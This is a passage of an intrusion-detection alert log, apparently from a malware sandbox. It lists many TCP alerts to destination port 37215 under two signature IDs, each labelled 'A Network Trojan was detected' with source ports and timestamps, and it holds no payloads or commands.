          SID:2829579
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886433
          SID:2835222
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039017
          SID:2835222
          Source Port:38798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462651
          SID:2829579
          Source Port:44766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535510
          SID:2835222
          Source Port:35628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424583
          SID:2829579
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811192
          SID:2829579
          Source Port:45262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543566
          SID:2829579
          Source Port:46250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247575
          SID:2829579
          Source Port:39450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848445
          SID:2829579
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806655
          SID:2829579
          Source Port:50116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939340
          SID:2835222
          Source Port:39356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324911
          SID:2835222
          Source Port:35346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876633
          SID:2829579
          Source Port:53914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297701
          SID:2835222
          Source Port:50274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.608528
          SID:2829579
          Source Port:57440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2835222
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267267
          SID:2829579
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.238165
          SID:2835222
          Source Port:41150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770887
          SID:2835222
          Source Port:36364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909241
          SID:2835222
          Source Port:36672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103298
          SID:2835222
          Source Port:46336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772712
          SID:2829579
          Source Port:36334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357126
          SID:2835222
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530185
          SID:2829579
          Source Port:34284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178129
          SID:2829579
          Source Port:42296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667394
          SID:2835222
          Source Port:38410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547976
          SID:2835222
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667012
          SID:2835222
          Source Port:45718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426552
          SID:2829579
          Source Port:56980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042066
          SID:2835222
          Source Port:54470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.091609
          SID:2835222
          Source Port:51514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196304
          SID:2835222
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664468
          SID:2835222
          Source Port:53382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847731
          SID:2835222
          Source Port:49870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247799
          SID:2829579
          Source Port:34156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215052
          SID:2829579
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935191
          SID:2829579
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843054
          SID:2835222
          Source Port:55382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178894
          SID:2835222
          Source Port:59790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176038
          SID:2835222
          Source Port:51032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209427
          SID:2829579
          Source Port:48932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228190
          SID:2829579
          Source Port:52932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462595
          SID:2829579
          Source Port:45342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273161
          SID:2835222
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689733
          SID:2829579
          Source Port:34600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244816
          SID:2835222
          Source Port:52350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177081
          SID:2835222
          Source Port:40540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803813
          SID:2835222
          Source Port:43424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958695
          SID:2829579
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543612
          SID:2835222
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544120
          SID:2829579
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923028
          SID:2829579
          Source Port:44266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590967
          SID:2829579
          Source Port:58360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209154
          SID:2829579
          Source Port:56912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631490
          SID:2835222
          Source Port:35382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330178
          SID:2829579
          Source Port:57872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532059
          SID:2829579
          Source Port:44056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150879
          SID:2829579
          Source Port:54512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466365
          SID:2829579
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543536
          SID:2835222
          Source Port:46280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821885
          SID:2835222
          Source Port:54492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197309
          SID:2835222
          Source Port:51672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222396
          SID:2829579
          Source Port:45310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760301
          SID:2835222
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847672
          SID:2829579
          Source Port:58712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176487
          SID:2835222
          Source Port:39020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547026
          SID:2835222
          Source Port:41612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350359
          SID:2835222
          Source Port:58302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267092
          SID:2835222
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075491
          SID:2835222
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466112
          SID:2829579
          Source Port:37356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466499
          SID:2835222
          Source Port:52472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116844
          SID:2829579
          Source Port:38416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174028
          SID:2829579
          Source Port:43008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326794
          SID:2835222
          Source Port:48290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666977
          SID:2829579
          Source Port:53158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939485
          SID:2829579
          Source Port:59508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930479
          SID:2835222
          Source Port:33068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241994
          SID:2829579
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631399
          SID:2835222
          Source Port:41986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085432
          SID:2835222
          Source Port:52274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634168
          SID:2835222
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890085
          SID:2829579
          Source Port:50142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744723
          SID:2835222
          Source Port:47906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923663
          SID:2835222
          Source Port:47872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782468
          SID:2835222
          Source Port:33184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922748
          SID:2829579
          Source Port:58288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535749
          SID:2829579
          Source Port:54862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271196
          SID:2835222
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542195
          SID:2829579
          Source Port:53750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131676
          SID:2835222
          Source Port:59122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591467
          SID:2829579
          Source Port:48852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496739
          SID:2829579
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324170
          SID:2829579
          Source Port:56908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090743
          SID:2835222
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204590
          SID:2829579
          Source Port:46066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022234
          SID:2829579
          Source Port:54310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709180
          SID:2829579
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780764
          SID:2829579
          Source Port:60706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046927
          SID:2829579
          Source Port:37524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196904
          SID:2835222
          Source Port:56654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953928
          SID:2835222
          Source Port:35124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.286004
          SID:2835222
          Source Port:38148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400747
          SID:2829579
          Source Port:38078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983486
          SID:2835222
          Source Port:55518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485481
          SID:2835222
          Source Port:47718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560849
          SID:2829579
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283683
          SID:2835222
          Source Port:39368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.198258
          SID:2835222
          Source Port:40546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273312
          SID:2829579
          Source Port:35394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864688
          SID:2829579
          Source Port:56404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529075
          SID:2829579
          Source Port:53136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298956
          SID:2829579
          Source Port:57798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033260
          SID:2829579
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678541
          SID:2829579
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921311
          SID:2835222
          Source Port:36500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892691
          SID:2829579
          Source Port:57320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325766
          SID:2835222
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336917
          SID:2829579
          Source Port:42590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143866
          SID:2835222
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170876
          SID:2829579
          Source Port:41442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846864
          SID:2829579
          Source Port:33720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.313474
          SID:2829579
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462565
          SID:2829579
          Source Port:42286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265707
          SID:2829579
          Source Port:51534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726936
          SID:2829579
          Source Port:50508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551652
          SID:2835222
          Source Port:51780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922239
          SID:2829579
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485519
          SID:2829579
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655819
          SID:2835222
          Source Port:35236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338708
          SID:2829579
          Source Port:55190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742339
          SID:2829579
          Source Port:36018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990606
          SID:2835222
          Source Port:40584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229039
          SID:2835222
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271989
          SID:2835222
          Source Port:47058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843148
          SID:2835222
          Source Port:59412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485040
          SID:2829579
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559851
          SID:2829579
          Source Port:44648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528034
          SID:2829579
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473294
          SID:2835222
          Source Port:39348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405326
          SID:2829579
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635885
          SID:2835222
          Source Port:54028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281433
          SID:2835222
          Source Port:52628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.623958
          SID:2835222
          Source Port:50736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756756
          SID:2835222
          Source Port:60810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.926913
          SID:2829579
          Source Port:52610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269226
          SID:2835222
          Source Port:37780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287352
          SID:2829579
          Source Port:33642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232626
          SID:2829579
          Source Port:46924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176511
          SID:2835222
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239660
          SID:2829579
          Source Port:44720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324205
          SID:2835222
          Source Port:52198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536803
          SID:2835222
          Source Port:46176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711376
          SID:2829579
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336097
          SID:2835222
          Source Port:44846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209526
          SID:2829579
          Source Port:48220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298528
          SID:2829579
          Source Port:60880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195286
          SID:2835222
          Source Port:54746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403329
          SID:2835222
          Source Port:60306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276247
          SID:2835222
          Source Port:51530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745746
          SID:2835222
          Source Port:39740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075040
          SID:2829579
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797128
          SID:2835222
          Source Port:36832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922339
          SID:2835222
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552134
          SID:2829579
          Source Port:59136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154169
          SID:2835222
          Source Port:49678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022444
          SID:2829579
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325386
          SID:2835222
          Source Port:38544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965160
          SID:2835222
          Source Port:35854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010508
          SID:2829579
          Source Port:40398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.773883
          SID:2829579
          Source Port:43766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422014
          SID:2829579
          Source Port:56634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903472
          SID:2835222
          Source Port:37318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327838
          SID:2835222
          Source Port:45250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103003
          SID:2835222
          Source Port:49900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707553
          SID:2835222
          Source Port:49804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.992947
          SID:2829579
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.417737
          SID:2835222
          Source Port:43898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155059
          SID:2829579
          Source Port:53138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849994
          SID:2829579
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845291
          SID:2829579
          Source Port:50832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339305
          SID:2829579
          Source Port:36126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543536
          SID:2829579
          Source Port:47882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.165583
          SID:2835222
          Source Port:50404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403325
          SID:2829579
          Source Port:58244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143686
          SID:2829579
          Source Port:38164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710313
          SID:2829579
          Source Port:59534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838590
          SID:2835222
          Source Port:36336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358927
          SID:2829579
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170568
          SID:2835222
          Source Port:59478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878779
          SID:2829579
          Source Port:52294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922590
          SID:2829579
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669461
          SID:2835222
          Source Port:37100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602001
          SID:2835222
          Source Port:46402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039155
          SID:2835222
          Source Port:35252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152236
          SID:2829579
          Source Port:44802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230227
          SID:2829579
          Source Port:59192
          Destination Port:37215
